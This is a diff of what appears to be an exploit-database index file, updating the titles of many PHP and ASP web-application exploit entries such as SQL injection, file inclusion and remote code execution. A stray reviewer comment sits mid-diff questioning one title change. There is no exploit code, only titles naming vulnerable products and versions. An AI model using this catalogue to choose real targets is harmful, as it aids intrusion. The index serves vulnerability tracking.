-6037,platforms/php/webapps/6037.txt,"phpDatingClub - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0
+6034,platforms/php/webapps/6034.txt,"DreamPics Builder - 'page' Parameter SQL Injection",2008-07-09,"Hussin X",php,webapps,0
+6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' Parameter SQL Injection",2008-07-10,"Hussin X",php,webapps,0
+6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Parameter Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0
+6037,platforms/php/webapps/6037.txt,"phpDatingClub 3.7 - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0
 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection",2008-07-11,"Nu Am Bani",php,webapps,0
 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0
 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0
-6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) SQL Injection",2008-07-11,"Hussin X",php,webapps,0
+6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - 'id_cat' Parameter SQL Injection",2008-07-11,"Hussin X",php,webapps,0
 6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
 6048,platforms/php/webapps/6048.txt,"Maian Events 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
 6049,platforms/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
 6050,platforms/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
 6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0
-6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0
-6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0
+6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0
+6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Parameter Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0
 6055,platforms/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",php,webapps,0
-6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,php,webapps,0
-6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0
-6058,platforms/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php id' SQL Injection",2008-07-12,"CWH Underground",php,webapps,0
-6060,platforms/php/webapps/6060.php,"Fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution",2008-07-13,"Charles Fol",php,webapps,0
+6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' Parameter SQL Injection",2008-07-12,Mr.SQL,php,webapps,0
+6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,php,webapps,0
+6058,platforms/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php' SQL Injection",2008-07-12,"CWH Underground",php,webapps,0
+6060,platforms/php/webapps/6060.php,"Fuzzylime CMS 3.01 - 'commrss.php' Remote Code Execution",2008-07-13,"Charles Fol",php,webapps,0
 6061,platforms/php/webapps/6061.txt,"Maian Guestbook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
 6062,platforms/php/webapps/6062.txt,"Maian Links 3.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
 6063,platforms/php/webapps/6063.txt,"Maian Recipe 1.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
 6064,platforms/php/webapps/6064.txt,"Maian Weblog 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
 6065,platforms/php/webapps/6065.txt,"Maian Uploader 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
 6066,platforms/php/webapps/6066.txt,"Maian Search 1.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0
-6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection",2008-07-13,DNX,php,webapps,0
+6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - 'players-detail.php' Blind SQL Injection",2008-07-13,DNX,php,webapps,0
 6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add Admin",2008-07-13,"CWH Underground",php,webapps,0
 6069,platforms/php/webapps/6069.txt,"ITechBids 7.0 gold - Cross-Site Scripting / SQL Injection",2008-07-13,Encrypt3d.M!nd,php,webapps,0
 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0
-6071,platforms/php/webapps/6071.txt,"CodeDB - 'list.php lang' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0
+6071,platforms/php/webapps/6071.txt,"CodeDB 1.1.1 - 'list.php' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0
 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0
-6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0
+6074,platforms/php/webapps/6074.txt,"Pluck CMS 4.5.1 - 'blogpost' Parameter Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0
 6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a - Cross-Site Scripting / SQL Injection",2008-07-15,StAkeR,php,webapps,0
 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0
-6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0
-6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0
+6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0
+6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection",2008-07-15,K-159,php,webapps,0
 6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0
 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0
 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0
@@ -19191,7 +19195,7 @@ id,file,description,date,author,platform,type,port
 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
 6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0
 6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
-6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0
+6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0
 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0
 6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0
 6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps,0
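Review bot: The new title for row 6018 in the `-19075,84` hunk prefixes the product with `QNX`, which looks like a mis-attribution. The row is filed under `platforms/php/webapps` with platform `php`, which does not fit QNX's Neutrino operating system and suggests an unrelated PHP web application of the same name. Anyone matching this index against an asset inventory by vendor or product name would get a false hit on QNX systems and miss the real product. Unless the advisory text confirms the vendor, I would keep the description as `Neutrino 0.8.4 Atomic Edition - Remote Code Execution`. Separately, rows 6058 and 6071 in the same hunk drop the affected parameter names (`id`, `lang`) while neighbouring rows gain a `'name' Parameter` form, so triage detail is lost there.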
@@ -19341,7 +19345,7 @@ id,file,description,date,author,platform,type,port
 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0
 6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0
 6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0
-6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0
+6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Parameter Blind SQL Injection",2008-09-05,JosS,php,webapps,0
 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
 6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
 6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
@@ -19432,7 +19436,7 @@ id,file,description,date,author,platform,type,port
 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php id' SQL Injection",2008-09-18,SarBoT511,php,webapps,0
 6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,php,webapps,0
 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0
-6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 - (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0
+6492,platforms/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0
 6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0
 6495,platforms/php/webapps/6495.txt,"Explay CMS 2.1 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2008-09-19,hodik,php,webapps,0
 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0
@@ -19953,10 +19957,10 @@ id,file,description,date,author,platform,type,port
 7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
 7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0
 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
-7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
+7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0
 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
 7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0
-7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
+7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0
 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0
@@ -20013,7 +20017,7 @@ id,file,description,date,author,platform,type,port
 7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0
 7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
 7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0
-7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0
+7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0
 7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0
 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps,0
 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0
@@ -20047,7 +20051,7 @@ id,file,description,date,author,platform,type,port
 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0
 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0
-7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - (index.php term) SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
+7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' Parameter SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - (Authentication Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0
 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection",2008-11-28,Stack,php,webapps,0
 7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
@@ -20490,7 +20494,7 @@ id,file,description,date,author,platform,type,port
 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0
 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0
 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
-7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0
+7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' Parameter SQL Injection",2009-01-26,FeDeReR,php,webapps,0
 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0
 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
@@ -20715,7 +20719,7 @@ id,file,description,date,author,platform,type,port
 8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0
 8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0
 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps,0
-8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
+8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0
 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0
 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0
@@ -20764,7 +20768,7 @@ id,file,description,date,author,platform,type,port
 8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0
 8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload",2009-04-07,EgiX,php,webapps,0
 8364,platforms/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0
-8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - (category) SQL Injection",2009-04-08,H!tm@N,php,webapps,0
+8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - 'category' Parameter SQL Injection",2009-04-08,H!tm@N,php,webapps,0
 8366,platforms/php/webapps/8366.txt,"Joomla! Component MailTo - (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0
 8367,platforms/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0
 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0
@@ -20958,7 +20962,7 @@ id,file,description,date,author,platform,type,port
 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0
 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0
 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0
-8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0
+8715,platforms/php/webapps/8715.txt,"Pluck CMS 4.6.2 - 'langpref' Parameter Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0
 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,php,webapps,0
 8718,platforms/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0
@@ -21150,7 +21154,7 @@ id,file,description,date,author,platform,type,port
 8978,platforms/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps,0
 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0
 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0
-8981,platforms/php/webapps/8981.txt,"phportal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0
+8981,platforms/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0
 8984,platforms/php/webapps/8984.txt,"CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0
 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0
 8988,platforms/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0
@@ -21160,7 +21164,7 @@ id,file,description,date,author,platform,type,port
 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x - Insecure Cookie",2009-06-22,TiGeR-Dz,php,webapps,0
 8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion",2009-06-22,CraCkEr,php,webapps,0
 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps,0
-8997,platforms/php/webapps/8997.txt,"Kasseler CMS - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0
+8997,platforms/php/webapps/8997.txt,"Kasseler CMS - File Disclosure / Cross-Site Scripting",2009-06-22,S(r1pt,php,webapps,0
 8998,platforms/php/webapps/8998.txt,"SourceBans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0
 8999,platforms/php/webapps/8999.txt,"Joomla! Component com_tickets 2.1 - 'id' SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps,0
 9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - (key) SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0
@@ -21424,7 +21428,7 @@ id,file,description,date,author,platform,type,port
 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0
 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0
-9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
+9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0
@@ -22423,7 +22427,7 @@ id,file,description,date,author,platform,type,port
 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0
 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0
 11507,platforms/php/webapps/11507.txt,"WSC CMS - (Bypass) SQL Injection",2010-02-19,Phenom,php,webapps,0
-11508,platforms/php/webapps/11508.txt,"Trixbox 2.2.4 - PhonecDirectory.php SQL Injection",2010-02-19,NorSlacker,php,webapps,0
+11508,platforms/php/webapps/11508.txt,"Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection",2010-02-19,NorSlacker,php,webapps,0
 11509,platforms/php/webapps/11509.txt,"PHPKit 1.6.1 - 'mailer.php' SQL Injection",2010-02-19,"Easy Laster",php,webapps,0
 11511,platforms/php/webapps/11511.txt,"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion",2010-02-19,kaMtiEz,php,webapps,0
 11515,platforms/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,php,webapps,0
@@ -22663,7 +22667,7 @@ id,file,description,date,author,platform,type,port
 11894,platforms/php/webapps/11894.txt,"CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
 11895,platforms/php/webapps/11895.txt,"CyberCMS - SQL Injection",2010-03-26,hc0de,php,webapps,0
 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,php,webapps,0
-11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite - (Module Jokes) SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0
+11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite Module Jokes - SQL Injection",2010-03-26,Sc0rpi0n,php,webapps,0
 11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection",2010-03-27,"Easy Laster",php,webapps,0
 11899,platforms/php/webapps/11899.html,"AdaptCMS Lite 1.5 2009-07-07 - Exploit",2010-03-27,ITSecTeam,php,webapps,0
 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
@@ -23484,7 +23488,7 @@ id,file,description,date,author,platform,type,port
 14026,platforms/php/webapps/14026.txt,"AbleDating script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0
 14028,platforms/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
-14030,platforms/asp/webapps/14030.pl,"PHPortal_1.2 - (gunaysoft.php) Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0
+14030,platforms/asp/webapps/14030.pl,"PHPortal 1.2 - 'gunaysoft.php' Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,asp,webapps,0
 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2 - Arbitrary File Upload / Local File Inclusion",2010-06-24,"Zer0 Thunder",php,webapps,0
 14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0
 14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0
@@ -24483,7 +24487,7 @@ id,file,description,date,author,platform,type,port
 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
 16901,platforms/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,php,webapps,0
 16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit (Metasploit)",2011-01-14,Metasploit,php,webapps,0
-16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0
+16904,platforms/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Parameter Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0
 16905,platforms/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps,0
 16906,platforms/php/webapps/16906.rb,"Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0
